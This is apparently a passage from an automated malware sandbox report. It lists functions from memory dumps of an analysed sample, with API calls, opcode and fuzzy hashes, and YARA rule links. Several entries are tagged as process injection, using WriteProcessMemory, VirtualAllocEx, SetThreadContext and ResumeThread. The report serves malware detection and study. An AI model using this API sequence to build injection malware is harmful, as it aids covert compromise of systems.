                                                                                          • Opcode Fuzzy Hash: c9c49d0b6da197c21b71fefe143e1cd0763d60351a971a62c6ee64554c07295f
                                                                                          • Instruction Fuzzy Hash: 04913971D10219CFDB10CFA8C885BEDBBB2BF48315F1585ADE819A7240DB749A86CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 01599448, Relevance: 1.7, APIs: 1, Instructions: 191COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0159968E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: a3eefd75f929e36329785ca538d1ad7207daffa27d2500a2d2909ac21481842f
                                                                                          • Instruction ID: 72f8f71e808871945e0f253860711bda566f88f357b6190ea1ce8c4b449da89b
                                                                                          • Opcode Fuzzy Hash: a3eefd75f929e36329785ca538d1ad7207daffa27d2500a2d2909ac21481842f
                                                                                          • Instruction Fuzzy Hash: 20712570A00B058FDB24DF69D04479ABBF5FF88208F04892ED48ADBA50DB75E855CF92
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 0159D9D4, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0159FEAA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: c01d455c35a5b4f70be374c716c34efa189a42dab923ec75bcf98176f41e8c40
                                                                                          • Instruction ID: 4602e6baa524fe934f30a7ee2ba212039ffa9ed9ab7a8266763adfa65374f0d0
                                                                                          • Opcode Fuzzy Hash: c01d455c35a5b4f70be374c716c34efa189a42dab923ec75bcf98176f41e8c40
                                                                                          • Instruction Fuzzy Hash: DE51BFB1D002089FDF14CF9AC884ADEBFB5BF48714F24852AE519AB210D775A855CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 0159FD8C, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0159FEAA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: 4de57281840384e82c907450d1756dd602d45ccf66e430ad76ee30b5e5ebc656
                                                                                          • Instruction ID: 826616c6161dce6753cc4035d94611cd38f41bb0fa96a8c041f290f053729fed
                                                                                          • Opcode Fuzzy Hash: 4de57281840384e82c907450d1756dd602d45ccf66e430ad76ee30b5e5ebc656
                                                                                          • Instruction Fuzzy Hash: BF51CFB1D002099FDF14CFA9C884ADDBFB5FF48314F24862AE919AB210D7759855CF90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 01595364, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 01595421
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          • Opcode ID: 21815068fa6d00a3fe53811dd9fa7d7bd36992ba218e56858c181e424938f23a
                                                                                          • Instruction ID: fe96179ef50496f279875dbacb45b0a77c9c00f6d7230b2b8720b048ec891bd6
                                                                                          • Opcode Fuzzy Hash: 21815068fa6d00a3fe53811dd9fa7d7bd36992ba218e56858c181e424938f23a
                                                                                          • Instruction Fuzzy Hash: F44102B1D00618CFDB24DFA9C8887DDBBB5BF49309F24846AD408AB250E7756946CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 01593E08, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 01595421
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          • Opcode ID: 754df81f74caecf64ad4baef65491f5bd144ef2a56cfa46c940978965243dcec
                                                                                          • Instruction ID: ba16cc1f4e4dae9829534a94ad7eb0df3c32048f3e98d16958adc859a97670e1
                                                                                          • Opcode Fuzzy Hash: 754df81f74caecf64ad4baef65491f5bd144ef2a56cfa46c940978965243dcec
                                                                                          • Instruction Fuzzy Hash: 5B41F271D00618CFDB24DFA9C888BDDBBB5FF49308F20846AD408AB250E7B56946CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C7E9A8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08C7EA38
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: c30ff136a8dc9d209802f14d391f96e592eba6212a120cbeb811d034b41abb49
                                                                                          • Instruction ID: d90312d7067d6df04d9a20b8fc2c0fb7ca2aa2ab6d6df7c35b0ef12ee790b18f
                                                                                          • Opcode Fuzzy Hash: c30ff136a8dc9d209802f14d391f96e592eba6212a120cbeb811d034b41abb49
                                                                                          • Instruction Fuzzy Hash: 55212A729003599FCB10DFA9C8847DEBBF5FF48324F548829E919A7240D7789955CBA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 0159A13D, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0159B91E,?,?,?,?,?), ref: 0159BDE7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 3abfb30f5a85b66c6f147f8a19ab40f48ea3f9282105f2a5ef21a80ff1dae9d7
                                                                                          • Instruction ID: a0584a9eb1523bf0287aa70db90348fbc4290077f76ba9ac98bec728bc3a1fff
                                                                                          • Opcode Fuzzy Hash: 3abfb30f5a85b66c6f147f8a19ab40f48ea3f9282105f2a5ef21a80ff1dae9d7
                                                                                          • Instruction Fuzzy Hash: F82117B5900208DFDB10CFA9D584AEEBFF8FB48314F14841AE914A7310D375A955CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 0159A1B4, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0159B91E,?,?,?,?,?), ref: 0159BDE7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: c4815c5d8175238ade5552cca0f314f319cd1585c895478b9c915c5dc05427d6
                                                                                          • Instruction ID: f18deb98936d3b074d85d1e7a914a68e87fbd0f71dbc1b92e49d3272a8437dde
                                                                                          • Opcode Fuzzy Hash: c4815c5d8175238ade5552cca0f314f319cd1585c895478b9c915c5dc05427d6
                                                                                          • Instruction Fuzzy Hash: DA21E5B5900209DFDB10CFAAD584AEEBBF8FB48324F14841AE914A7310D375A954CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 0159BD5A, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0159B91E,?,?,?,?,?), ref: 0159BDE7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: c6e10348a8ccb729c2c3735015efa6f97740a8fa8961c4e682fd5be8e72a64d1
                                                                                          • Instruction ID: 38a216bc1d62a5471a7e980a3ab7c12fe83bf9fe5883ca954ce993a0cb7b48b7
                                                                                          • Opcode Fuzzy Hash: c6e10348a8ccb729c2c3735015efa6f97740a8fa8961c4e682fd5be8e72a64d1
                                                                                          • Instruction Fuzzy Hash: 8F21E4B59002199FDB10CFAAD984ADEBFF8FF48324F14841AE914A7310D379A954CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C7EA98, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08C7EB18
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          • Opcode ID: aa35e5b43f27222186b510045cc940017a19f0d7aae8680334bb2fd71ab5381a
                                                                                          • Instruction ID: 089013bb9d8b4cd3b071f3d3b83476c319a2de3cac7edacf3e76a74ccd194fe9
                                                                                          • Opcode Fuzzy Hash: aa35e5b43f27222186b510045cc940017a19f0d7aae8680334bb2fd71ab5381a
                                                                                          • Instruction Fuzzy Hash: 8F2159719003499FCB00DFAAC884AEEFBF5FF48324F50882DE519A3240D739A951CBA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C7E810, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 08C7E88E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: ContextThread
                                                                                          • String ID:
                                                                                          • API String ID: 1591575202-0
                                                                                          • Opcode ID: c2a18676e2e73220005f461b1bcdb472ff618cb0711a8e162a779b4064721d27
                                                                                          • Instruction ID: 9dbcf6d61e390fccab3114b74a22c9252120defc16d1f5c78d2b81b15a5a85fe
                                                                                          • Opcode Fuzzy Hash: c2a18676e2e73220005f461b1bcdb472ff618cb0711a8e162a779b4064721d27
                                                                                          • Instruction Fuzzy Hash: 91212972D003098FDB10DFAAC4847EEBBF4EF48228F54882DD519A7640DB78A945CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 015987B0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01599709,00000800,00000000,00000000), ref: 0159991A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: 2ea3cc79c0087057b7660551fc1bdb7de048639b08c1ac9ab8188f0b38632953
                                                                                          • Instruction ID: 4512f6ff8da741796af00adb163d40e319aa8a83d1095c1ccc973cfd11abcf4a
                                                                                          • Opcode Fuzzy Hash: 2ea3cc79c0087057b7660551fc1bdb7de048639b08c1ac9ab8188f0b38632953
                                                                                          • Instruction Fuzzy Hash: DB1117B69002499FDB10CF9AC484BDEFBF8FB48324F14842EE515AB200D375A545CFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C7E8E8, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08C7E956
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: e993f914ece3b7f9d09bb8db0265b250327248edcc5a4b083e0b817491bbce33
                                                                                          • Instruction ID: bbe0330628941784c594e57c7473c32bd60941f3fc19a6d61cae2078d2840b9a
                                                                                          • Opcode Fuzzy Hash: e993f914ece3b7f9d09bb8db0265b250327248edcc5a4b083e0b817491bbce33
                                                                                          • Instruction Fuzzy Hash: 4B1137729002499FCB10DFA9C844BEFBBF9EF48324F148829E519A7250D775A955CFA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 015998A8, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01599709,00000800,00000000,00000000), ref: 0159991A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: ed6983b7d60f424509502bfb3f0bb32c7dcbd6a6832c9bbc2c739d2105c467dc
                                                                                          • Instruction ID: 55fa6b1ba768ca251fe01e3dcfe4db366333c57e4e7f2109d5004b7c4c14a0dc
                                                                                          • Opcode Fuzzy Hash: ed6983b7d60f424509502bfb3f0bb32c7dcbd6a6832c9bbc2c739d2105c467dc
                                                                                          • Instruction Fuzzy Hash: D911D0B69002498FDB10CFAAD588ADEBBF4FF48224F14842EE519A7600D379A545CFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C7E160, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 7c6eff0a73364f0556954bc8c0a71f18cd16d99ba813d7b67bd5a1f79f0529aa
                                                                                          • Instruction ID: a44a499c7eb7f2b93d5e3e2fe9202f25824401453eaa104ad8fa4136b7243d7c
                                                                                          • Opcode Fuzzy Hash: 7c6eff0a73364f0556954bc8c0a71f18cd16d99ba813d7b67bd5a1f79f0529aa
                                                                                          • Instruction Fuzzy Hash: 91113A719002498FCB10DFAAC4457EFFBF9EF88224F24882DD519A7240D775A945CBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 04D81EA2, Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 04D81F05
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: MessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 410705778-0
                                                                                          • Opcode ID: 073415052106502fd07a19c3eede7b64b2bf6f5a9882673e24d55c8982164009
                                                                                          • Instruction ID: 83e3db6c0913fd28c851a4e3f796b345caca8b195811741a780f521ada9bc255
                                                                                          • Opcode Fuzzy Hash: 073415052106502fd07a19c3eede7b64b2bf6f5a9882673e24d55c8982164009
                                                                                          • Instruction Fuzzy Hash: B21136B6800249DFCB10DF99C488BDFBBF8FB48324F10881AE514A3200C375A555CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 01599628, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0159968E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: 9a14dd4e68ef0970afa1f04eee7db08c814e62b41342d071ab595bc3f2c8035b
                                                                                          • Instruction ID: 92be735618d53e95e3d8d150ea2221860ce5a9c029d6dc0acd1d9768cbb4513f
                                                                                          • Opcode Fuzzy Hash: 9a14dd4e68ef0970afa1f04eee7db08c814e62b41342d071ab595bc3f2c8035b
                                                                                          • Instruction Fuzzy Hash: 061110B6C006498FDB10CF9AC444BDEFBF8FF88228F14842AD919A7200D379A545CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 04D81EA8, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 04D81F05
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: MessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 410705778-0
                                                                                          • Opcode ID: fd87c1b2468c93ef31ac069ef139e3954f2e379f7a368056ea171f9b6507dfe6
                                                                                          • Instruction ID: d4241a0d8c8d5fd2fb8356f82ccbc14ab44ba90b962b1c4562001ce4a0c7cf85
                                                                                          • Opcode Fuzzy Hash: fd87c1b2468c93ef31ac069ef139e3954f2e379f7a368056ea171f9b6507dfe6
                                                                                          • Instruction Fuzzy Hash: 2B1103B68002499FDB10DF99C488BDEBBF8FB48324F10841AE514A3200D375A554CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F7D4C4, Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244219349.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 51847f6d68435cfaaf0352735adbde3867703947e47b10966451f2f14c917e90
                                                                                          • Instruction ID: 605aba158baa524fc6496cc35f631e51597fc7e8a8d517558a24f5d2168ec3e7
                                                                                          • Opcode Fuzzy Hash: 51847f6d68435cfaaf0352735adbde3867703947e47b10966451f2f14c917e90
                                                                                          • Instruction Fuzzy Hash: 9421F872504240DFDB05DF54D9C0B26BF75FF88328F68C56AE8091B246C336D856EBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F8D01C, Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244239927.0000000000F8D000.00000040.00000001.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 56eb4fb4d759560b8aa9cb0af9f67c7f0d411b1a1f3c3d625d3d002582fda67c
                                                                                          • Instruction ID: 4954a33476324bbca623f428c6cbe8738794938eb1a85c775ee53cc4229ffdce
                                                                                          • Opcode Fuzzy Hash: 56eb4fb4d759560b8aa9cb0af9f67c7f0d411b1a1f3c3d625d3d002582fda67c
                                                                                          • Instruction Fuzzy Hash: BE21F272904240DFDB14EF54D8C4B56BBA5FF84328F24C96DE84A4B28AC336D847EB61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F8D1D4, Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244239927.0000000000F8D000.00000040.00000001.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7ab21a53a68c3b00ce9b8e55f3412ffae99a0256e1be5ffbc1ade9f6049c2fc6
                                                                                          • Instruction ID: 8baf0c0d07b1a00296aa9cc40f2aee32517d192a2465ffadd75e4e7f82bb94c5
                                                                                          • Opcode Fuzzy Hash: 7ab21a53a68c3b00ce9b8e55f3412ffae99a0256e1be5ffbc1ade9f6049c2fc6
                                                                                          • Instruction Fuzzy Hash: BC210771904204DFDB05EF54D9C0B56BBA5FF84324F24C96DE8094B285C336D846EB61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F8D005, Relevance: .1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244239927.0000000000F8D000.00000040.00000001.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9791908c6ea9edae135d5bbe9e8fcf29f0b46d013665271c7deacdf477fa04d8
                                                                                          • Instruction ID: ca6dcb5333711625673924815eeacc08f703a31c2bc878a2965e11227be1d289
                                                                                          • Opcode Fuzzy Hash: 9791908c6ea9edae135d5bbe9e8fcf29f0b46d013665271c7deacdf477fa04d8
                                                                                          • Instruction Fuzzy Hash: 2D217F755093808FCB02DF24D990755BF71EF46324F28C5EAD8498B697C33A980ADB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F7D4BF, Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244219349.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a7d85455df3ea54cf3aba3b0efac5b37b78ef0d14b19c1e3f8f59425cab7dae7
                                                                                          • Instruction ID: 36b9d2b4e644425b84e7174da377def400aaea1d1755233c701db0532c0489be
                                                                                          • Opcode Fuzzy Hash: a7d85455df3ea54cf3aba3b0efac5b37b78ef0d14b19c1e3f8f59425cab7dae7
                                                                                          • Instruction Fuzzy Hash: ED11D376804280CFCB15CF14D5C4B16BF72FF88324F28C6AAD8490B656C336D856DBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F8D1CF, Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244239927.0000000000F8D000.00000040.00000001.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 28e1b8e01115b57a316b36ec44b19060ffa815e5d5fa698a4e18cc1574b44f31
                                                                                          • Instruction ID: c843a8609536306d66556242d0dff7c1722ee0983bce5907538eef9820394d2e
                                                                                          • Opcode Fuzzy Hash: 28e1b8e01115b57a316b36ec44b19060ffa815e5d5fa698a4e18cc1574b44f31
                                                                                          • Instruction Fuzzy Hash: 3711BB75904280DFCB05DF14C9C0B55BBA1FF84324F28C6ADD8494B696C33AD84ADB61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F7D745, Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244219349.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6ec6d208838acf807a959915f91525e93fd21fc83e72c5999028be96e6bcb9e3
                                                                                          • Instruction ID: 1d5b4a3b7e756d2fd8ddfcab5ceb878cf41b116fa5e30630db0e0821fbccbf1a
                                                                                          • Opcode Fuzzy Hash: 6ec6d208838acf807a959915f91525e93fd21fc83e72c5999028be96e6bcb9e3
                                                                                          • Instruction Fuzzy Hash: CA01F7724083409AE7149E55CC84B66BFECEF45338F58C55BED0C0F282D3799846D6B2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00F7D744, Relevance: .0, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244219349.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f57639f383d2d794acc3032b4b6aefb9d282834cfd3c6587625e64ba84abb9a1
                                                                                          • Instruction ID: 6c347f20de1aa54a0eeb81164801f2848e89975149e37d147a7abcd094c54397
                                                                                          • Opcode Fuzzy Hash: f57639f383d2d794acc3032b4b6aefb9d282834cfd3c6587625e64ba84abb9a1
                                                                                          • Instruction Fuzzy Hash: 53F0C2728042449AEB148E15DC88B62FFE8EF81734F18C45AED080F286C379AC44CAB2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions

                                                                                          Function 009F8B54, Relevance: 2.8, Instructions: 2751COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.243754824.00000000009F2000.00000002.00020000.sdmp, Offset: 009F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.243742220.00000000009F0000.00000002.00020000.sdmp Download File
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 49aacfe542bc0d9d046482f5dc48413ac7b9efd34e69ae8e4bde46513cec7167
                                                                                          • Instruction ID: 0b4dbf6625a661a14926be34c1035c92ce0d8a4d8078f882f4cf1e02592c5154
                                                                                          • Opcode Fuzzy Hash: 49aacfe542bc0d9d046482f5dc48413ac7b9efd34e69ae8e4bde46513cec7167
                                                                                          • Instruction Fuzzy Hash: 1733E52244E3D29FC7138B789CB16E17FB5AE5721471E09CBD4C08F0B3D268696AD762
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C7712A, Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: B8>w
                                                                                          • API String ID: 0-3045393504
                                                                                          • Opcode ID: e3b76072a5a1a46a7c55479bc8d7affb4c9e9204eeb1d3833a54cf3f0cb446e7
                                                                                          • Instruction ID: a8cfd73e15e26f43431439189b294c0097f75d080f021769a4d887e7a99fc031
                                                                                          • Opcode Fuzzy Hash: e3b76072a5a1a46a7c55479bc8d7affb4c9e9204eeb1d3833a54cf3f0cb446e7
                                                                                          • Instruction Fuzzy Hash: 29C1FB74D1520ADFCB04CFA6C4858AEFBB2FF89302B14D5AAD815A7365D7349942CF90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C77138, Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: B8>w
                                                                                          • API String ID: 0-3045393504
                                                                                          • Opcode ID: 5a8b187408eece5e838feb4976d367ad06549796ef29f9c820c1d5a6f3669b64
                                                                                          • Instruction ID: 96efe87cb642abd667ba4d90890e14a092c58df2e8ec0dc5b0a9997d8c82cb13
                                                                                          • Opcode Fuzzy Hash: 5a8b187408eece5e838feb4976d367ad06549796ef29f9c820c1d5a6f3669b64
